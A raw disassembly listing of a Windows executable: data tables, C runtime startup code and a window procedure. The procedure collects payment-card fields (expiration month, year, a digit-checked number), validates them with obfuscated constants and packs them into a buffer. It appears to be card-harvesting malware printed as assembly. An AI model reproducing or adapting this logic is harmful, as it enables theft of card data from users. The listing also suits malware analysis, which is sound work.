dd 5A3F4D3Fh, 653F603Fh, 783F723Fh, 8A3F7D3Fh, 953F903Fh
dd 0DA3FCA3Fh, 3FFB3Fh, 800000h, 21C00h, 88300600h, 0D930CC30h
dd 0F130E930h, 1F311330h, 35312E31h, 93318031h, 0AF31A931h
dd 0D331C131h, 0EB31D931h, 0F31FD31h, 35322332h, 55323F32h
dd 70325C32h, 96328232h, 0BA32A832h, 0D432CE32h, 0FC32DA32h
dd 24331B32h, 33332D33h, 59334233h, 7A335F33h, 92338833h
dd 0A6339B33h, 0CB33AE33h, 0F233D533h, 0D33F833h, 22341B34h
dd 48342F34h, 5B345134h, 8E346634h, 0A7349334h, 0DB34BF34h
dd 1C350634h, 35352235h, 6D353D35h, 7C357335h, 9A358F35h
dd 0CE35BC35h, 0E535DC35h, 635FF35h, 34361836h, 54364436h
dd 85367F36h, 0A4369B36h, 0C536BF36h, 0DA36CF36h, 1836EA36h
dd 25371F37h, 49373F37h, 5E375337h, 81377B37h, 0A2378B37h
dd 0AF37A937h, 0BF37B837h, 0D637CF37h, 0E737E137h, 0FB37F237h
dd 0B380437h, 37382238h, 49384238h, 62385B38h, 77387138h
dd 8E388038h, 98389338h, 0C438A238h, 0D038C938h, 0F438E138h
dd 2D390C38h, 60393239h, 76396639h, 9D398039h, 0B039A439h
dd 0D039C739h, 0DF39D639h, 0F639ED39h, 0A3A0139h, 1D3A143Ah
dd 583A343Ah, 6A3A5E3Ah, 783A713Ah, 893A833Ah, 0A13A953Ah
dd 0B23AA63Ah, 0E33ABF3Ah, 0F03AEA3Ah, 53AFF3Ah, 173B113Bh
dd 333B233Bh, 3F3B383Bh, 563B493Bh, 613B5B3Bh, 903B753Bh
dd 0A23B9C3Bh, 0C53BBF3Bh, 0DC3BCA3Bh, 0FE3BEE3Bh, 1D3C173Bh
dd 603C313Ch, 713C673Ch, 853C7B3Ch, 9E3C903Ch, 0AE3CA33Ch
dd 0C23CBB3Ch, 0E73CC83Ch, 0F23CED3Ch, 303D023Ch, 3F3D363Dh
dd 583D4D3Dh, 803D5F3Dh, 933D873Dh, 0CE3DAA3Dh, 0DE3DD43Dh
dd 0F13DEA3Dh, 33DFD3Dh, 1D3E0F3Eh, 283E223Eh, 383E2E3Eh
dd 633E453Eh, 853E693Eh, 983E8B3Eh, 0B33E9D3Eh, 0D53EB93Eh
dd 0E83EDB3Eh, 33EED3Eh, 253F093Fh, 383F2B3Fh, 533F3D3Fh
dd 753F593Fh, 883F7B3Fh, 0A33F8D3Fh, 0BD3FA93Fh, 0DD3FC33Fh
dd 0F83FF03Fh, 90003Fh, 25800h, 14300000h, 32301A30h, 46303830h
dd 6F304E30h, 0B530A330h, 0C730C030h, 0E130D630h, 0F430E830h
dd 2630FF30h, 42312F31h, 6A316431h, 93318631h, 0AE31A931h
dd 0C531BD31h, 0ED31E131h, 531F631h, 1A321532h, 4A322932h
dd 5D325632h, 87327B32h, 0A0329B32h, 0DC32AF32h, 0F232E232h
dd 0F330132h, 3D333833h, 60334833h, 88336C33h, 9A339533h
dd 0B033A333h, 0BA33B533h, 0CC33C633h, 0D633D133h, 0E833E233h
dd 0F233ED33h, 433FE33h, 0E340934h, 20341A34h
dd 2A342534h, 3F343934h, 54344434h, 6A345B34h, 7A347034h
dd 0CD34A834h, 0DB34D534h, 0EB34E134h, 1434F134h, 26352035h
dd 5C352D35h, 6C356235h, 7D357735h, 91358635h, 0B2359735h
dd 0D335BD35h, 635F935h, 14360B36h, 26362136h, 34362C36h
dd 47364136h, 55364C36h, 64365D36h, 76367136h, 8C367F36h
dd 96369136h, 0A836A236h, 0B236AD36h, 0C436BE36h, 0CE36C936h
dd 0E036DA36h, 0EA36E536h, 0FC36F636h, 6370136h, 18371237h
dd 22371D37h, 34372E37h, 3E373937h, 50374A37h, 5A375537h
dd 6C376637h, 76377137h, 88378237h, 92378D37h, 0A4379E37h
dd 0AE37A937h, 0C037BA37h, 0CA37C537h, 0DC37D637h, 0E637E137h
dd 0F837F237h, 237FD37h, 17381138h, 24381C38h, 36383138h
dd 4C383F38h, 57385138h, 6B386138h, 76387138h, 0AE389038h
dd 0F738B538h, 1C391438h, 0BB397D39h, 0E739DC39h, 0C39FB39h
dd 3B3A123Ah, 7D3A573Ah, 913A8B3Ah, 0AA3AA13Ah, 0D83AB03Ah
dd 0F63AE63Ah, 223B0E3Ah, 373B283Bh, 4D3B3D3Bh, 633B5D3Bh
dd 873B753Bh, 0A53B8D3Bh, 0C33BB73Bh, 0E03BCB3Bh, 0EC3BE63Bh
dd 5A3C4E3Bh, 6A3C603Ch, 7E3C743Ch, 8E3C873Ch, 0A63C963Ch
dd 0B83CB13Ch, 0E43CD33Ch, 0F33CEC3Ch, 143D043Ch, 333D243Dh
dd 483D423Dh, 603D533Dh, 753D653Dh, 913D873Dh, 0A33D983Dh
dd 0B53DAE3Dh, 0D43DCE3Dh, 0E33DDE3Dh, 93DFE3Dh, 223E1C3Eh
dd 323E2D3Eh, 453E3E3Eh, 653E5B3Eh, 773E6C3Eh, 0B33E873Eh
dd 0C63EB93Eh, 0F53ED63Eh, 163EFB3Eh, 273F213Fh, 873F7E3Fh
dd 0FF3FF23Fh, 0A0003Fh, 1C800h, 20300500h, 56302730h
dd 0B130AB30h, 0C630BF30h, 0DF30D930h, 3030EA30h, 71315631h
dd 97319031h, 0A631A131h, 0B731AD31h, 0C231BC31h, 0D031C931h
dd 0E531DF31h, 331FD31h, 1D321632h, 40323432h, 52324A32h
dd 5F325732h, 6C326632h, 92328932h, 0B732A432h, 0CF32C932h
dd 832E532h, 23331433h, 51333F33h, 91336633h, 9C339633h
dd 0D533C433h, 0F033DB33h, 1C33F633h, 5A343134h, 9E347534h
dd 0BC34A434h, 0D934C534h, 334DF34h, 26352035h, 39353235h
dd 76357035h, 0B1358335h, 0E635BE35h, 335ED35h, 1F361936h
dd 6D363536h, 9A368536h, 0AB36A636h, 0BB36B436h, 0C936C436h
dd 0EA36DC36h, 5236FC36h, 96375B37h, 0A1379B37h, 0C637BE37h
dd 0E337D337h, 0F537EE37h, 27381037h, 3D383838h, 79385638h
dd 99388038h, 0B938A038h, 0FF38C038h, 19390538h, 29392039h
dd 38392E39h, 4B393D39h, 71396139h, 90397D39h, 0BC39A439h
dd 0E339C339h, 0F39F539h, 3B3A213Ah, 533A413Ah, 803A793Ah
dd 0B53AA33Ah, 0DC3AD13Ah, 0FD3AF73Ah, 3A3B0F3Ah, 4A3B433Bh
dd 803B733Bh, 0B73BA53Bh, 0D73BBF3Bh, 1F3BE43Bh, 433C303Ch
dd 5C3C573Ch, 793C6F3Ch, 913C803Ch, 0CE3CA43Ch, 0E03CDB3Ch
dd 63CE63Ch, 393D2D3Dh, 503D423Dh, 6B3D653Dh, 883D783Dh
dd 0A83D9C3Dh, 0B93DAE3Dh, 0CF3DC23Dh, 0E63DDB3Dh, 3DF63Dh
dd 143E0B3Eh, 2A3E1E3Eh, 3C3E333Eh, 4D3E423Eh, 693E5C3Eh
dd 823E763Eh, 0A73E8B3Eh, 0B83EAF3Eh, 0E03ECB3Eh, 0F43EED3Eh
dd 1E3EFA3Eh, 553F2F3Fh, 0C83F853Fh, 0E23FCE3Fh, 3FF93Fh
dd 0B00000h, 4C00h, 24301E00h, 51304B30h, 1030AC30h, 56313C31h
dd 70316531h, 94318A31h, 0D631B731h, 6A31F431h, 7A327232h
dd 83328232h, 923A8A3Ah, 8E3A9A3Ah, 0A63B9A3Bh, 0BE3BB23Bh
dd 0D63BCA3Bh, 0EE3BE23Bh, 63BFA3Bh, 120003Ch, 4400h, 0FC300000h
dd 98329431h, 0A0329C32h, 0A832A432h, 0B432AC32h, 0BC32B832h
dd 0C432C032h, 0CC32C832h, 0D832D032h, 0E032DC32h, 0E832E432h
dd 0F032EC32h, 4C32F432h, 54375037h, 375837h, 1400000h
dd 2000h, 98319400h, 0AC319C31h, 0B431B031h, 0BC31B831h
dd 0C431C031h, 31C831h, 74h dup(0)
dd 146A8000h, 46h, 1702800h, 3 dup(100h), 1703400h, 1703800h
dd 1703C00h, 716B6B00h, 2E5F7876h, 6C6C64h, 794600h, 1704000h
dd 0
dd 694C5F00h, 69614D62h, 30406Eh, 45EAh dup(0)
_data ends
; ---------------------------------------------------------------------------
; Section 4. (virtual address 0003A000)
; Virtual size : 0000AC10 ( 44048.)
; Section size in file : 0000AC10 ( 44048.)
; Offset to raw data for section: 0003A000
; Flags 60000020: Text Executable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 43A000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_43A006: ; DATA XREF: sub_43A026+A�o
xor eax, eax
inc eax
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
jz short locret_43A025
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_43A025: ; CODE XREF: .text:0043A014�j
retn
; =============== S U B R O U T I N E =======================================
sub_43A026 proc near ; CODE XREF: .text:0043A14E�p
; .text:0043A17C�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_43A006
push large dword ptr fs:0
mov large fs:0, esp
loc_43A043: ; CODE XREF: sub_43A026+44�j
; sub_43A026+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43A072
cmp esi, [esp+1Ch+arg_4]
jz short loc_43A072
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43A043
call dword ptr [ebx+esi*4+8]
jmp short loc_43A043
; ---------------------------------------------------------------------------
loc_43A072: ; CODE XREF: sub_43A026+2A�j
; sub_43A026+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43A026 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A080 proc near ; CODE XREF: .text:0043A141�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_43A098
push [ebp+arg_0]
call sub_444BA4
loc_43A098: ; DATA XREF: sub_43A080+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43A080 endp
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43A175
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43A0D3: ; CODE XREF: .text:0043A16C�j
cmp esi, 0FFFFFFFFh
jz loc_43A184
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43A163
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword_44B034, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword_44B038, eax
mov eax, [edx+4]
mov dword_44B03C, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_44B040
mov esi, dword_44B038
rep movsd
lea edi, dword_44B040
mov dword_44B038, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43A163
js short loc_43A171
mov edi, [ebx+8]
push ebx
call sub_43A080
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43A026
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43A163: ; CODE XREF: .text:0043A0E4�j
; .text:0043A139�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43A0D3
; ---------------------------------------------------------------------------
loc_43A171: ; CODE XREF: .text:0043A13B�j
xor eax, eax
jmp short loc_43A18E
; ---------------------------------------------------------------------------
loc_43A175: ; CODE XREF: .text:0043A0B8�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43A026
add esp, 0Ch
loc_43A184: ; CODE XREF: .text:0043A0D6�j
push 0Bh
call sub_444BEC
add esp, 4
loc_43A18E: ; CODE XREF: .text:0043A173�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43A1A7
call sub_43A1C3
loc_43A1A7: ; CODE XREF: .text:0043A1A0�j
call sub_444B2F
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, off_44B000
call eax ; sub_444B04
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A1C3 proc near ; CODE XREF: .text:0043A1A2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_444BBC
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_444BBC
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_444BBC
mov [ebp+var_C], eax
push (offset aWr+2)
push [ebp+var_8]
call sub_444BB0
mov dword_44B008, eax
push offset aWr ; "wr"
push [ebp+var_4]
call sub_444BB0
mov dword_44B004, eax
push offset aWr ; "wr"
push [ebp+var_C]
call sub_444BB0
add esp, 30h
mov dword_44B00C, eax
mov edi, dword_44B004
or edi, edi
jz short loc_43A23C
push 0
push edi
call sub_444BF8
add esp, 8
loc_43A23C: ; CODE XREF: sub_43A1C3+6C�j
mov edi, dword_44B00C
or edi, edi
jz short loc_43A256
push 0
push edi
call sub_444BF8
add esp, 8
call sub_43A25C
loc_43A256: ; CODE XREF: sub_43A1C3+81�j
pop edi
leave
retn
sub_43A1C3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A25C proc near ; CODE XREF: sub_43A1C3+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_444B98
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43A294
; ---------------------------------------------------------------------------
loc_43A278: ; CODE XREF: sub_43A25C+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_43A280
inc [ebp+var_C]
loc_43A280: ; CODE XREF: sub_43A25C+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43A294: ; CODE XREF: sub_43A25C+1A�j
cmp byte ptr [ebx], 0
jnz short loc_43A278
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_444BE0
pop ecx
mov [ebp+var_8], eax
mov dword_44B010, eax
cmp [ebp+var_8], 0
jnz short loc_43A2C2
xor eax, eax
jmp short loc_43A31F
; ---------------------------------------------------------------------------
loc_43A2C2: ; CODE XREF: sub_43A25C+60�j
mov ebx, [ebp+var_10]
jmp short loc_43A30C
; ---------------------------------------------------------------------------
loc_43A2C7: ; CODE XREF: sub_43A25C+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_43A306
push [ebp+var_4]
call sub_444BE0
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_43A2F4
jmp short loc_43A31F
; ---------------------------------------------------------------------------
loc_43A2F4: ; CODE XREF: sub_43A25C+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_444C04
add esp, 8
add [ebp+var_8], 4
loc_43A306: ; CODE XREF: sub_43A25C+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43A30C: ; CODE XREF: sub_43A25C+69�j
cmp byte ptr [ebx], 0
jnz short loc_43A2C7
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_43A31F: ; CODE XREF: sub_43A25C+64�j
; sub_43A25C+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A25C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A324 proc near ; DATA XREF: .data:0044B2B8�o
push ebp
mov ebp, esp
push offset dword_44ABA8
call ds:dword_447A3C ; InterlockedIncrement
mov eax, ds:dword_44ABA8
pop ebp
retn 4
sub_43A324 endp
; =============== S U B R O U T I N E =======================================
sub_43A33B proc near ; CODE XREF: sub_442C0A+203�p
push 2
call sub_43BE25
push 0
call sub_43BE25
add esp, 8
retn
sub_43A33B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A34D proc near ; DATA XREF: sub_44108E+E0E�o
; sub_44108E+E5E�o ...
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_219 = byte ptr -219h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov eax, ebx
cmp eax, 100h
jz short loc_43A37E
jl loc_43A8C9
cmp eax, 111h
jz loc_43A418
jmp loc_43A8C9
; ---------------------------------------------------------------------------
loc_43A37E: ; CODE XREF: sub_43A34D+19�j
cmp [ebp+arg_8], 9
jnz loc_43A8C9
mov edi, dword_44B12C
sub edi, 5
jmp short loc_43A3FE
; ---------------------------------------------------------------------------
loc_43A393: ; CODE XREF: sub_43A34D+C4�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
cmp ds:dword_448380[eax], esi
jnz short loc_43A3C8
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_448384[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43A8C9
; ---------------------------------------------------------------------------
loc_43A3C8: ; CODE XREF: sub_43A34D+5A�j
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
cmp ds:dword_448384[eax], esi
jnz short loc_43A3FD
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_448388[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43A8C9
; ---------------------------------------------------------------------------
loc_43A3FD: ; CODE XREF: sub_43A34D+8F�j
inc edi
loc_43A3FE: ; CODE XREF: sub_43A34D+44�j
mov eax, dword_44B1AC
add eax, 5Bh
movsx edx, word_44B0D8
add eax, edx
cmp edi, eax
jb short loc_43A393
jmp loc_43A8C9
; ---------------------------------------------------------------------------
loc_43A418: ; CODE XREF: sub_43A34D+26�j
mov edi, dword_44B0CC
dec edi
jmp short loc_43A43B
; ---------------------------------------------------------------------------
loc_43A421: ; CODE XREF: sub_43A34D+FA�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
mov eax, ds:dword_44838C[eax]
cmp [ebp+arg_C], eax
jz short loc_43A449
inc edi
loc_43A43B: ; CODE XREF: sub_43A34D+D2�j
movsx eax, word_44B100
add eax, 5Bh
cmp edi, eax
jb short loc_43A421
loc_43A449: ; CODE XREF: sub_43A34D+EB�j
movsx eax, word_44B194
add eax, 64h
cmp edi, eax
jz loc_43A8C9
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_448378[eax]
call ds:dword_44ABA4 ; GetWindowTextA
mov eax, dword_44B1B8
mov byte ptr [ebp+eax+var_208+1], 4Bh
mov eax, dword_44B1B0
add eax, dword_44B1C0
mov edx, dword_44B09C
add edx, dword_44B0EC
sub edx, 0Dh
mov byte ptr [ebp+eax+var_208+2], dl
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_445020
add esp, 8
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_448380[eax]
call ds:dword_44ABA4 ; GetWindowTextA
mov eax, dword_44B198
movsx edx, word_44B1A8
add eax, edx
movsx eax, [ebp+eax+var_10B]
movsx edx, word_44B16C
add edx, dword_44B0A4
sub edx, 6
cmp eax, edx
jnz short loc_43A54D
mov eax, dword_44B17C
sub eax, 6
push eax
push 0
push offset aPleaseSelectEx ; "Please, select Expiration Month"
push 0
call ds:dword_44A640 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_448380[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43A8C9
; ---------------------------------------------------------------------------
loc_43A54D: ; CODE XREF: sub_43A34D+1C7�j
push offset word_44C832
call sub_4424C1
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_445020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_445020
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_448384[eax]
call ds:dword_44ABA4 ; GetWindowTextA
mov eax, dword_44B0AC
add eax, dword_44B1CC
movsx eax, [ebp+eax+var_10A]
mov edx, dword_44B0E4
sub edx, 2
cmp eax, edx
jnz short loc_43A5FF
mov eax, dword_44B18C
add eax, dword_44B1C8
sub eax, 3
push eax
push 0
push offset aPleaseSelect_0 ; "Please, select Expiration Year"
push 0
call ds:dword_44A640 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_448384[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43A8C9
; ---------------------------------------------------------------------------
loc_43A5FF: ; CODE XREF: sub_43A34D+273�j
push offset word_44C80E
call sub_4424C1
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_445020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_445020
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_448388[eax]
call ds:dword_44ABA4 ; GetWindowTextA
movsx eax, word_44B194
add eax, dword_44B188
movsx eax, [ebp+eax+var_103]
mov edx, dword_44B09C
sub edx, 8
cmp eax, edx
jz loc_43A7AC
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43A683: ; CODE XREF: sub_43A34D+33B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43A683
mov edx, eax
mov ecx, dword_44B1B8
movsx eax, word_44B100
add ecx, eax
sub ecx, 8
cmp edx, ecx
jb loc_43A7AC
mov eax, dword_44B0C4
add eax, dword_44B0F0
sub eax, 8
mov [ebp+var_105], al
jmp short loc_43A6DE
; ---------------------------------------------------------------------------
loc_43A6BC: ; CODE XREF: sub_43A34D+3AA�j
movzx eax, [ebp+var_105]
mov al, [ebp+eax+var_103]
cmp al, 30h
jl short loc_43A6D2
cmp al, 39h
jle short loc_43A6D7
loc_43A6D2: ; CODE XREF: sub_43A34D+37F�j
jmp loc_43A7AC
; ---------------------------------------------------------------------------
loc_43A6D7: ; CODE XREF: sub_43A34D+383�j
add [ebp+var_105], 1
loc_43A6DE: ; CODE XREF: sub_43A34D+36D�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43A6E7: ; CODE XREF: sub_43A34D+39F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43A6E7
movzx ecx, [ebp+var_105]
cmp ecx, eax
jb short loc_43A6BC
movsx eax, word_44B0D8
add eax, dword_44B0D4
sub eax, 6
mov [ebp+var_104], al
jmp short loc_43A788
; ---------------------------------------------------------------------------
loc_43A711: ; CODE XREF: sub_43A34D+454�j
mov al, [ebp+var_104]
mov [ebp+var_219], al
jmp short loc_43A748
; ---------------------------------------------------------------------------
loc_43A71F: ; CODE XREF: sub_43A34D+414�j
movzx eax, [ebp+var_219]
movsx eax, [ebp+eax+var_103]
movzx edx, [ebp+var_104]
movsx edx, [ebp+edx+var_103]
cmp eax, edx
jnz short loc_43A763
add [ebp+var_219], 1
loc_43A748: ; CODE XREF: sub_43A34D+3D0�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43A751: ; CODE XREF: sub_43A34D+409�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43A751
movzx ecx, [ebp+var_219]
cmp ecx, eax
jb short loc_43A71F
loc_43A763: ; CODE XREF: sub_43A34D+3F2�j
movzx eax, [ebp+var_219]
movzx edx, [ebp+var_104]
sub eax, edx
movsx edx, word_44B0C8
sub edx, 4
cmp eax, edx
jg short loc_43A7AC
add [ebp+var_104], 1
loc_43A788: ; CODE XREF: sub_43A34D+3C2�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43A791: ; CODE XREF: sub_43A34D+449�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43A791
movzx ecx, [ebp+var_104]
cmp ecx, eax
jb loc_43A711
jmp loc_43A842
; ---------------------------------------------------------------------------
loc_43A7AC: ; CODE XREF: sub_43A34D+327�j
; sub_43A34D+353�j ...
movsx eax, word_44B0C8
add eax, 7C9h
push eax
call ds:dword_44A630
push offset a5 ; "5"
call sub_4424C1
mov [ebp-21Ch], eax
push offset word_44C7BE
call sub_4424C1
mov edx, dword_44B18C
add edx, dword_44B174
sub edx, 0Ah
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call ds:dword_44A640 ; MessageBoxA
push offset word_44C7BA
call sub_4424C1
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp+var_220], eax
mov edx, eax
push ds:dword_448388[edx]
call ds:dword_44A654 ; SetWindowTextA
mov eax, 30h
mul edi
mov [ebp+var_224], eax
push ds:dword_448388[eax]
call ds:dword_447A40 ; SetFocus
jmp loc_43A8C9
; ---------------------------------------------------------------------------
loc_43A842: ; CODE XREF: sub_43A34D+45A�j
push offset byte_44C7B5
call sub_4424C1
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_445020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_445020
mov eax, 30h
mul edi
mov [ebp+var_228], eax
push ds:dword_448378[eax]
call ds:dword_448224 ; DestroyWindow
lea eax, [ebp+var_204]
push eax
call ds:dword_44504C
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp+var_22C], eax
push ds:dword_448374[eax]
call ds:dword_44A658 ; ShowWindow
mov eax, 30h
mul edi
mov [ebp+var_230], eax
and ds:dword_448370[eax], 0
loc_43A8C9: ; CODE XREF: sub_43A34D+1B�j
; sub_43A34D+2C�j ...
mov edi, dword_44B124
dec edi
jmp loc_43A9A9
; ---------------------------------------------------------------------------
loc_43A8D5: ; CODE XREF: sub_43A34D+666�j
mov eax, 30h
mul edi
mov [ebp+var_8], eax
cmp esi, ds:dword_448380[eax]
jnz short loc_43A90C
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_C], eax
push ds:dword_448390[eax]
call ds:dword_44A60C ; CallWindowProcA
jmp loc_43A9B9
; ---------------------------------------------------------------------------
loc_43A90C: ; CODE XREF: sub_43A34D+599�j
mov eax, 30h
mul edi
mov [ebp+var_10], eax
cmp esi, ds:dword_448384[eax]
jnz short loc_43A940
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_14], eax
push ds:dword_448394[eax]
call ds:dword_44A60C ; CallWindowProcA
jmp short loc_43A9B9
; ---------------------------------------------------------------------------
loc_43A940: ; CODE XREF: sub_43A34D+5D0�j
mov eax, 30h
mul edi
mov [ebp+var_18], eax
cmp esi, ds:dword_448388[eax]
jnz short loc_43A974
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_1C], eax
push ds:dword_448398[eax]
call ds:dword_44A60C ; CallWindowProcA
jmp short loc_43A9B9
; ---------------------------------------------------------------------------
loc_43A974: ; CODE XREF: sub_43A34D+604�j
mov eax, 30h
mul edi
mov [ebp+var_20], eax
cmp esi, ds:dword_44837C[eax]
jnz short loc_43A9A8
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_24], eax
push ds:dword_44839C[eax]
call ds:dword_44A60C ; CallWindowProcA
jmp short loc_43A9B9
